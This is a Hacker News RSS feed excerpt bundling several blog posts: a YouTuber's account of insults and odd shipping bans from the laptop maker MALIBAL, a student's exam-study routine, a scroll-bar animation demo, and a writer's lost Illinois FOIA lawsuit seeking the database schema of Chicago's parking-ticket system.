<![CDATA[Hacker News - Small Sites - Score >= 1]]> https://news.ycombinator.com RSS for Node Mon, 03 Mar 2025 04:23:19 GMT Mon, 03 Mar 2025 04:23:19 GMT 240 <![CDATA[Linux laptop maker called me a Zombie]]> thread link) | @todsacerdoti
March 2, 2025 | https://thelibre.news/this-linux-laptop-maker-called-me-a-zombie/ | archive.org

Two years ago I was contacted by a company called MALIBAL.

They were interested in a sponsorship, where I would simply put their link in the video description and get money for it.

I did a quick background check, and they seemed like a proper Linux hardware manufacturing company. I said I'd be happy to shout them out in the videos too, and we agreed on a price.

Initially, things seemed to be going pretty well. They did decide that my demographic wasn't that appealing to them and that they would thus sponsor one video per week, which is reasonable.

However, I made a mistake. I changed my publishing schedule last minute, which meant switching the description sponsorship from one video to another; what I did not notice is that towards the end of the video that I chose to be sponsored, I said, "This video is not sponsored." Big mistake on my side.

fullscreen

MALIBAL did notice. This is the sort of mistake that I can quickly fix through the YouTube video editor, but they preferred to directly end our partnership without enough context for me to realize the mistake. They also told me to bill for the GNOME video as usual.

One month later, as agreed, I billed them for the video. I still had no idea about the mistake. They replied with, and I quote,

You have a lot of nerve sending me this invoice considering you literally say in the video that it's NOT sponsored. What a crackhead. Did you really think you were getting away with that? KDE is the trash bin of the Linux world. There is no wonder that's what you like [sic]
fullscreen

Woah. I decided to explain the mistake due to the change of schedule, and that I could've fixed it in the YouTube editor; but, I also pointed out that this sort of language was unacceptable.

They replied with the simple sentence "You're a zombie who is dead and empty inside. You don't even exist".

fullscreen

And that was it. I no longer did any sponsorship with MALIBAL, and I thought that was going to be the end of it.

However, if we perform a quick research on the user experience with MALIBAL, we discover that this type of reaction is pretty common.

One user said that when he tried to cancel the order due to slow shipping, they replied with "Don't ever place an order with us again or it will be canceled", and soon after: "Good one, zombie. You don't even exist. Back into the abyss you go".

fullscreen

Another user received the reply "It's the response a phantom, zombie like you deserves. You don't exist. You're not a person. You are here to simply suck life out of the human. If you weren't dead and empty inside you would feel shame for what you have done".

fullscreen

These are just a few examples. Reddit is full of this kind of support replies after the slightest pushback from the clients.

fullscreen

Even people who claim to have worked with MALIBAL professionally state that they had to "decline their business" as they were "too difficult to work with", eventually being called zombies as well.

fullscreen

This is just the tip of the iceberg in terms of the general weirdness of MALIBAL.

Firstly, they issued a response to this whole "zombie" accusation by trying to say it did not happen (but it did, it happened to me too), and saying that the official name of the accusation is "Zombiegate".

fullscreen

To distance themselves from it, they listed all of Apple's scandals, and then claimed that what happened with them is not that bad compared to it.

fullscreen

I absolutely love their closing statement here:

Our commitment? To tirelessly support our customers—zombie, ghost, or otherwise—while maintaining a level of integrity befitting the smallest scandal possible. After all, the abyss awaits us all… but here at MALIBAL, we’ll send you there with a smile. 🙂

I can't help but laugh to think that the person replying to the emails with insults is the very same person that approved this text.

As another example, due to a discussion about coreboot that I will later focus on, they have decided to ban the entire country of Germany from their services. They banned … Germany, due to the actions of a single person there. Oh, and they also banned Austria and Liechtenstein, because they're also Germany. Somehow.

fullscreen

They also don't ship to California due to regulations impacting small businesses there.

fullscreen

They also don't ship to Colorado due to the actions of Jeremy Soller.

fullscreen

They also don't ship to Maryland due to the actions of Matt DeVillier.

fullscreen

They also don't ship to Poland due to the actions of Piotr Król.

fullscreen

They also refuse to ship anything made by AMD due to, again, Matt DeViller.

fullscreen

Or - I just can't stop now - in their terms and conditions, it specifically says that you cannot use Chrome to access their website, nor can you use GMail to create an account in it, nor can you use a Pixel Phone to access it, nor use the Android operating system to view it, or any other products including Google Search. You literally cannot use Google Search to open their website, according to their terms and conditions. What!? If you are found to use any of these technologies, your account will be terminated without notice.

fullscreen

Oh, and, by the way, the same applies to Apple. You can't access the website through Safari, an iPhone or any MacBook, or register using Apple Mail.

fullscreen

Oh, and, by the way, the same applies to Reddit users. If you use Reddit frequently, you are prohibited from using this website. They also have half a page just to explain exactly what they mean by "active Reddit user".

They have quite a track record of doing all of this. Back in 2017, they were already in business and they were allegedly censoring negativity on notebookreview forums and banned users who had good warranties after they made negative comments.

fullscreen

More recently, they managed to get into the Linux news circle by publishing an article called "Don’t Support the Coreboot Project".

What happened? Well, they wanted their machines to support Coreboot, so they contacted 9elements to ask for coreboot-supported boards. When they learned that they were priced between 50k and 100k, they decided to instead develop them themselves. However, they did not have the necessary skills to do so, which made them come back to 9elements to ask them for help.

fullscreen

Now, Christian does not speak English natively, and he did apologize for the sometimes broken language and typos in his emails after this article was published. It however seems like most of the conflict stems from the fact that MALIBAL thought their code was pretty much ready and only required a little bit of debugging, whereas 9elements thought that there was much work to be done still.

fullscreen

Christian offered to work to support coreboot on the laptops by taking a commission for each laptop sold, something MALIBAL saw as borderline stealing. Then, when they were assigned a developer called Max to work on the project, MALIBAL complained that he was not experienced enough.

fullscreen

MALIBAL was also asking for updates to what it seems like an unreasonable pace. You can see it in their own article, as they point out that "several more days passed without any updates". This was also later confirmed by 9elements.

They started accusing Max of not working at an actual full time rate but only a few hours, and they asked for another developer to be working on the project. Mind you, by now, there was still no contract with 9elements and MALIBAL had not paid them anything.

Eventually, Christian got fed up and decided to end the collaboration. They sent back to MALIBAL the test hardware they were given, and they did not charge them for anything.

fullscreen

MALIBAL then tried to collaborate with a second contractor company, 3mdeb. However, they were annoyed by the fact that 3mdeb offered a lower price if MALIBAL had used a Dasharo-braded coreboot instead of an unbranded one.

fullscreen

Frustrated, MALIBAL completely ignored their quote (which was 33k for Dasharo coreboot, and 66k for unbranded), and asked to pay $150 an hour with daily updates.

fullscreen

I do admire how 3mdeb managed to stay professional in their reply, where they pretty much said "we don't do per-hour contracting, we've sent you the quotes, that's what we're asking, and you can't just make up your own price".

fullscreen

As a very mature response to these two experiences, MALIBAL contacted the Coreboot project and asked to please remove 9elements and 3mdeb from the list of official contractors. Coreboot obviously refused, but Matt DeViller - from the Coreboot leadership team - told them he would try to help port Coreboot to their laptop.

fullscreen

Now, I just have to read you the quote of their article about Matt, because it's pure poetry.

Matt DeVillier is the type of person who will suck your will to live out of you and leave you for dead. Nice guy. He embodies every trait you would never want in someone you hire for a job. He’s unprofessional, unreliable, untrustworthy, irresponsible, and incompetent. And, of course, he’s one of these types who will bludgeon you with all of these virtuous qualities, and if at any point you dare say a word in protest, he’ll try to turn things around and act like you did something wrong by calling you toxic. No, we’re not toxic, Matt. You just really honestly truly suck.
fullscreen

What did Matt do to deserve this? Well, the day after receiving MALIBAL test hardware - still without being paid anything, mind you - he was assigned a high priority project for AMD and warned MALIBAL that he could only start working a couple months from now.

fullscreen

During this wait, Matt started buying the tools needed to work on this project. However, he bought one from China, which MALIBAL seems to consider a mistake in itself. He then decided to source one from the US.

Then, he pointed out that his unit had a damaged UART connector. This is also something MALIBAL blames on him.

They continued to put pressure onto him, asking for almost-daily updates, until Matt decided he was no longer interested in working with MALIBAL.

fullscreen

Since Matt claimed to have done nothing wrong, MALIBAL offered to let a neutral third party decide to arbitrate the matter – which I truly don't understand. Are they trying to get a moral high ground through some weird litigation process? They did not even pay the guy.

fullscreen

The article is full of extremely aggressive sentences, like "This is the type of gaslighting you would only expect from a sociopath" and, also poetry,

[Maximally bad] is where you do such a horrible job that it’s impossible to have done any worse. Not impossible for a person to have done worse; impossible for anyone or anything to have done worse: a person, a monkey, a rock, etc.
fullscreen

MALIBAL concludes this whole piece by saying that they think that it's possible to finish the project is barely 40 hours. They are unable to do it because they don't seem to have the skills to, but still, 40 hours.

fullscreen

Finally, MALIBAL wants us to know that during these exchanges, they've tried their best not to offend anyone and get along as much as possible. As an example, they did not anyone "a monkey", nor have they implied that they were one. Thanks, MALIBAL.

Now, most parties involved did briefly reply to this article. Matt stated:

FWIW, none of the entities listed ever charged or were paid by Malibal for any work done. Evaluation of the state of their existing work and what they wanted done was done as a courtesy, and any further work was declined by the consultant(s). No contracts were ever signed, no statements of work produced.

9elements also published a blogpost, which includes the following quote:

Throughout the engagement, we encountered communication challenges, including frequent status update requests and a misalignment between expectations and technical realities. The initial firmware required considerable work before it could be tested on hardware, which understandably caused some delays. Unfortunately, during this period, the tone of communication from MALIBAL became less constructive.
fullscreen

Now, I would love to know more about who's behind MALIBAL, and what's happening within the - probably, single-person - company. However, I have not found any information about that; if you have any, please feel free to contact me.

I do fear that, by publishing this piece, I might get the entire country of Italy banned from them. But I believe it's a risk worth taking.

]]>
https://thelibre.news/this-linux-laptop-maker-called-me-a-zombie/ hacker-news-small-sites-43237987 Mon, 03 Mar 2025 03:25:28 GMT
<![CDATA[BM25 in PostgreSQL – 3x Faster Than Elasticsearch]]> thread link) | @gaocegege
March 2, 2025 | https://blog.vectorchord.ai/vectorchord-bm25-revolutionize-postgresql-search-with-bm25-ranking-3x-faster-than-elasticsearch | archive.org

Unable to retrieve article]]>
https://blog.vectorchord.ai/vectorchord-bm25-revolutionize-postgresql-search-with-bm25-ranking-3x-faster-than-elasticsearch hacker-news-small-sites-43237911 Mon, 03 Mar 2025 03:10:23 GMT
<![CDATA[How I Ace Midterms at a Top CS School by Studying 1-3 Hours (and Skipping Class)]]> thread link) | @ocean_moist
March 2, 2025 | https://rohan.ga/blog/studying/ | archive.org

I have a midterm tomorrow (actually)[0] and instead of studying I decided to write this piece on exactly how I spend as little time as possible on school while achieving decent results (top ~5-10% on tests).

This protocol is heavily tailored to me and my background specifically. I do think some people can get a few ideas from this though.

tl;dr:

Step 0: Optimize health and mental state (sleep, nutrition, meditation).
Step 1: Use Claude to quickly analyze lecture slides and practice tests.
Step 2: Memorize slides by creating interconnected mental stories.
Step 3: Brain dump notes, write code, and practice active recall.
Step 4: Take practice test, rapidly iterate on weak areas.
Step 5: Identify easy wins—predict and memorize likely test content.
Step 6: Final review, active recall, and Claude-powered reinforcement right before the exam.

background

I’m a decent test-taker and code a lot, so most concepts aren’t new. I rarely attend lectures and do the bare minimum homework required to pass. My broad curiosity gives me wide, shallow knowledge. Interestingly, I enjoy taking tests, especially multiple-choice.

studying process

The zeroth thing I do is the night before the exam I will get a perfect sleep and the morning of I will minimize the amount of brain power I am spending until the exam. I will eat properly and cleanly and meditate (which I generally try to do daily anyways). This is maybe the biggest power law in terms of my score on exams. Around 2-4 hours immediately before the exam I will start the process.

The first thing I will do is collect all of the lecture slides + practice tests and upload them to a Claude project and ask it what’s on the exam. I’ll ask for the types of questions, a structured overview of the materials, and what I have to know/memorize. What’s especially important at this stage is getting a feel for the types of questions the test likes to ask while not revealing any specific questions on the practice test. This should take no longer than 15 minutes. If I feel like I already know 100% everything on the test I will skip to taking the practice test.

I will then read over all the lecture slides once and commit them to memory. I’ll frame it like a story, X works with Y to do Z and Z is used to do A, and you need A to do B, and so on. I’ll also relate them to concepts I already know. Just build a mental map. After reading the slides for one lecture I’ll see if I can recall them before moving on to the next.

After I memorize all the lecture slides I’ll brain dump everything I know into written notes. I’ll try to be as accurate and all encompassing as possible. I will also try to write as much code as possible while taking these notes to get familiar with writing code on paper with a pencil. I’ll then review all the notes and see what I missed. Generally I miss a few details for each concept. I will rewrite whatever I missed and on particularly tricky concepts make a mental note to recall them later on in my studying/reviewing (active recall).

I then will take the practice test. I will go over my test taking strategy in the next section. Generally I just take the test as fast as possible and answer every question in this stage. I’ll review and rewrite all my questions that I got wrong. Referring only to my written notes.

After this I go for easy wins, trying to figure out exactly what’s on the test. I’ll give an example. If you know only topics from the lectures + homework are covered, and that the practice tests and real tests are similar you can infer and just memorize stuff that will probably be on the test. If there is a practice question about implementing an algorithm, and you only covered 2 algorithms in your homework in that specific section, chances are you can just memorize the other algorithms and be fine. Some test questions are so specific that all permutations of them are obvious and you can just memorize the trick or entire solution to them.

To keep my mind warm I’ll ask claude for questions simmilar to the ones on the practice test and try and recall the lecture slides (particularly the tricky parts) while I am walking to take the test. If there are like complex/technical things I’ll make Claude explain them to me again and review my physical notes.

The best part about the process is that you can basically start at any step depending on how confident (or lazy) you are. Sometimes I just talk to claude frantically while walking. You can also do this days before the exam and multiple times to ensure you know everything 100%.[1]

Generally what I notice is that if you actually do and 100% know the homework and go to lecture you just don’t have to study (shocker).

test taking strategy

The way I take tests is I skim the whole test front to back first. Then if I am very lost I’ll start on the easiest questions (I often do this when I haven’t studied at all), but generally I just go front to back and circle harder questions to come back to later. I am trying to go as fast as possible and rely on my intuition as much as possible. The asterisk is that if I attempt a problem (write something down) I will see it through until I get an answer or am at a complete blocking point (like I just don’t know something and I can clearly articulate what piece of knowledge I am missing). I will never actively stop my train of thought because I am taking too long (my CS tests generally give loads of time, so I don’t have to worry about this). If the question is multiple choice I will eliminate every other solution instead of just finding the one that’s correct. Once I am done I’ll go back to the hard, circled questions. I am generally completely in flow and I’ll slow down my rush and cadence to my test taking once I get to the circled questions.

Once I have answered every question I’ll go back and review all the multiple choice ones, just go back through my chain of thought and verify I didn’t do anything stupid. I’ll often try to solve the problem in different ways to verify also. The questions where I write code I’ll briefly go over how I thought about it but I mainly look for syntax errors. I don’t continue checking my work until the time runs out mainly because I just don’t find that to be the most valuable use of my time. But on the SAT and other tests I did do this, and this will maximize your score. When you are checking your answer, you should have a clear and defensible chain of thought. If you are not sure don’t change your answer just go with your initial instinct. Only change if you made a silly mistake or there was a clear and distinct error in your previous chain of thought.

After the test I rarely have any clue how I did because I was just in flow state. It’s like I just blacked out and took the test. I immediately forget everything that is on the test too. If I am asked a question about it the next day I won’t even remember what you are talking about and I’ll probably search it up.

conclusion

This is my process, my mind works in very mysterious ways. The main reason I am efficient with my time is that I have the (learned) ability to focus for many hours at a time and there is not “waiting” time or “relaxing” time when I am studying. I don’t take breaks and my mind is always firing on all cylinders, 100% occupied.

I have a decent memory but the pieces of information need to be highly interconnected. My memory is mostly a result of being able to find these connections, not just raw memorization. I also have never not studied like this and this is the only way I study currently.[2] I never did much meta creating this workflow this is just a descriptions of what happens when I need to take tests. (although I had prior knowledge of “active recall” and memory stuff because I find that stuff interesting)

There are risks to this approach, as if you bite off more than you can chew you have no time to self-correct. If you do this short/intense thing a lot you can burn out. I don’t know how well this would work on humanities tests. I just don’t care enough about school to spend anymore time than what I give.

Hopefully this doesn’t come off like I am bragging. Although my test scores are decent my GPA is very subpar and I am far from the picturesque college student. I am involed in almost no university affiliated activities. I have never scored the highest in the class. I don’t reccomend my exact approach, though I think implementing the elements into something more sustainable/personal is valuable.

why? (postscript)

Why would anyone not choose to attend the school they pay for? Why would they try and game the system?

For me, this is because I feel like, particularly in computer science, I have all the necessary skills and knowledge to do what I want. I want to build stuff, make stuff. I spend most of my time trying to build and make stuff. Somehow I thought in high school that my CS curriculum would be things I couldn’t learn online or was significantly different from what I already know. It turns out this was not the case.

Going to school for me is a hedge. If I can’t or don’t build something of significance, it’ll be easier for me to get a job with a degree. As soon as I build something that has clear evidence of significance I will stop doing school. The other option I have is trying to drop out and try and find work now, but I don’t know if I really want to work for someone else or if I could even find a job. It would most likely be at a startup, which is a huge career risk. Although I would 100% drop out if I could work on an interesting problem with smart people.

[0]proof

[1] It’s also scalable. I did this process when I was in algebra 2 (or maybe precalc?) to self-study for the AP Calc BC exam. I think the extent of my calc knowledge was limits + derivative is slope of the tangent line + integral is area under the curve. I pulled an all-nighter the day before the exam and just took it (this was apparently “fun” to me at this point in my life). I of course, only got a 3, which is a passing score but not one that helped me. Actually I used that score to take Calc 3 + linear algebra at community college while in HS but in college, even though I had Calc 3 credit I had to somehow make up Calc 1 and Calc 2 credit.

[2] I can’t do study groups. I actively bring down the productivity of study groups. I also notice I can’t code (work) when I am around my friends. Like even them just being in the corner of my vision prevents me from locking in. I am too drawn to social interaction. Different story if we are working together though.

]]>
https://rohan.ga/blog/studying/ hacker-news-small-sites-43237609 Mon, 03 Mar 2025 02:19:03 GMT
<![CDATA[Made a scroll bar buddy that walks down the page when you scroll]]> thread link) | @hello12343214
March 2, 2025 | https://focusfurnace.com/scroll_buddy.html | archive.org

( Look at your scroll bar when you scroll )

Instead of a boring scrollbar thought it would be fun to have an animated stick figure that walks up and down the side of your page when you scroll.

This is the first prototype i made.

Going to make a skateboarder, rock climber, or squirrel next. what other kinds of scroll buddies should I make?

Get a scroll buddy for your website

Warning: An embedded example on the side of this page has an animation / movement that may be problematic for some readers. Readers with vestibular motion disorders may wish to enable the reduce motion feature on their device before viewing the animation. If you have reduce motion settings turned on Scroll Buddy should be hidden on most browsers.

ignore all the text below its just lorem ipsum to have content for scrolling.
Ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.

Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem.

Ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.

Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem.

Ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.

Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem.

Ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.

Heading 2

Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.

Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem.

Ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.

Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem.

Ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.

Heading 2

Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem.

Ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.

Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.

Ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.

Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem.

Made with simple javascript

Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet.

Ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.

Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem.

At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident.

Heading 2

Similique sunt in culpa qui officia deserunt mollitia animi, id est laborum et dolorum fuga. Et harum quidem rerum facilis est et expedita distinctio. Nam libero tempore, cum soluta nobis est eligendi optio cumque nihil impedit.

Ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.

Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem.

Temporibus autem quibusdam et aut officiis debitis aut rerum necessitatibus saepe eveniet ut et voluptates repudiandae sint et molestiae non recusandae. Itaque earum rerum hic tenetur a sapiente delectus.

Ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.

Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem.

Heading 2

Ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.

Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem.

Ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.

Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem.

Ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.

Ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.

Heading 2

Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem.

Ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.

Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem.

Ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.

Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem.

Ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.

Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem.

Heading 2

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris.

Ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.

Ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.

Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem.

Ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.

Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem.

Ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.

Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem.

Ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.

Heading 2

Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem.

Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

]]>
https://focusfurnace.com/scroll_buddy.html hacker-news-small-sites-43237581 Mon, 03 Mar 2025 02:13:00 GMT
<![CDATA[Losing a 5-year-long Illinois FOIA lawsuit for database schemas]]> thread link) | @chaps
March 2, 2025 | https://mchap.io/losing-a-5yr-long-illinois-foia-lawsuit-for-database-schemas.html | archive.org

Losing a 5-year-long Illinois FOIA lawsuit for database schemas

March 2, 2025 — Matt Chapman

Thomas Ptacek, a friend and expert witness in this lawsuit summed it up best in the court's hallway while walking within three feet of opposing counsel: "This is fucking stupid".

His companion post explains why.

Intro

Working with the City of Chicago's parking ticket data—which I've received through FOIA—has always been a pain, especially in terms of knowing what exactly to request. In August 2018, I attempted to generally solve that problem, by submitting a request for the following:

An index of the tables and columns within each table of CANVAS.
Please include the column data type as well.

Per the CANVAS specification, the database in question is Oracle, 
so the below SQL query will likely yield the records pursuant to this request:

select utc.column_name as colname, uo.object_name as tablename, utc.data_type as type
from user_objects uo
join user_tab_columns utc on uo.object_name = utc.table_name
where uo.object_type = 'TABLE'

CANVAS Database Schema request on Muckrock

After the City initially denied the request with an argument that the records' release would compromise network security, I took the denial to court where we initially won at-trial. The City then appealed, which we won as well. The case ultimately went up to the Illinois Supreme Court, where we lost unanimously. Better Government Association did a good explainer of the consequences of that loss, which boils down to a significant broadening of public agencies' leeway to apply exemptions (i.e., withhold records or redact information) in response to FOIA requests.

Why Go Through All of This?

Under Illinois FOIA case law, if a request's responsive documents—the set of records or information within the scope of that request—are stored in a queryable database, a query must be written. The requester is not required to write the query. The law even requires the agency to give you the data in a format of your choice (protip: "excel format"). When it works, it's freaking great. Reality makes it difficult for a number of reasons, though:

  • The FOIA officer will likely need to defer any querying to a colleague who is a "data person."
  • You can't just ask a question:"FOIA does not compel the agency to provide answers to questions posed by the inquirer."
  • From the requester's perspective, "Is X column requestable?" isn't answerable without first attempting to request that column's data.
  • Requesting too many columns will likely lead to time-consuming back-and-forth, or a flat-out denial.
  • Even though Illinois FOIA requires that a requester be given a chance to narrow their request, FOIA officers sometimes just stop responding during this "conferral" process.

To generally work through this problem, many folk will spend hours surfing through PDFs, reports, contracts, work products, etc, just to get a sense of what data might exist. This process is frustrating and often yields incomplete results. Let's walk through my attempt with CANVAS.

First Attempts for Parking Ticket Data

My very first FOIA request was pretty narrow and sought the City's towing data. The City was unable to get me what I requested for reasons I can't seem to find, but it painted a picture that the Chicago doesn't really track how cars are towed.

A month later, the project began shifting towards parking ticket data in addition to towing data, so I requested:

all raw towing and parking violation records available in the CANVAS system and any records that are from imported/interpolated from non-CANVAS systems.

This request was denied. The Department of Finance argued that the request would take anywhere between 280 to 400 hours to complete:

There are 55 million ticket records and 928K seizure records in CANVAS. As far as tow information, we only have knowledge of when a vehicle is towed due to a boot and released. The Department of Finance's application support vender estimates a minimum of 60-80 hours to design/develop/test and run the program.

In addition, since this is like a conversion to another system, we are not sure how long it would take to transfer so much data, a rough estimate would be an additional 80-120 hours to design a solution to get all the data on some kind of media for retrieval. Compliance with this request as currently written would take approximately 140-200 hours utilizing our vendor's resources to the exclusion of other work assignments.

A couple months and some phone calls later, I submitted a narrower request, which was successfully fulfilled, because I included an explicit list of fields. After honing the request language a a bit more, I was eventually able to get the data used in the analysis of my first blog post.

But Wait, Is There More?

Despite getting the limited information I had requested, I still wanted to expand my analysis, which required knowing what other information exists within CANVAS. So, I submitted another request for high-level and low-level system information:


1. Code for CANVAS
2. Logs of CANVAS and/or CANVAS log analysis. 
3. Documentation for the operation of CANVAS, including how information is stored, what kind of database is used, along with any other technical documentation or generic documentation.
4. Any Wiki page related to CANVAS.
5. Any analysis of City parking ticket levels or trends.

The only records the City sent in response was a lackluster spreadsheet with just 100 rows, broken down by ward. I'm still not sure if this was the only analysis ever done at the time, but let's get back to the meat of this blog post.

1, 2, and 3 were denied because:

[The records] could be used in a security breach against CANVAS and jeopardize the security of the system, therefore it is being withheld.

But with the goal of just figuring out what information exists, the request was extremely wide and could have been narrowed to something more akin to a "data dictionary". To this day, I've never been able to get anything like a data dictionary from the City, though there is a contractual obligation—as described in the RFP spec for this $200 million system—for the City to maintain something like that! But alas, at least in 2018, the City claimed they don't have anything like it.

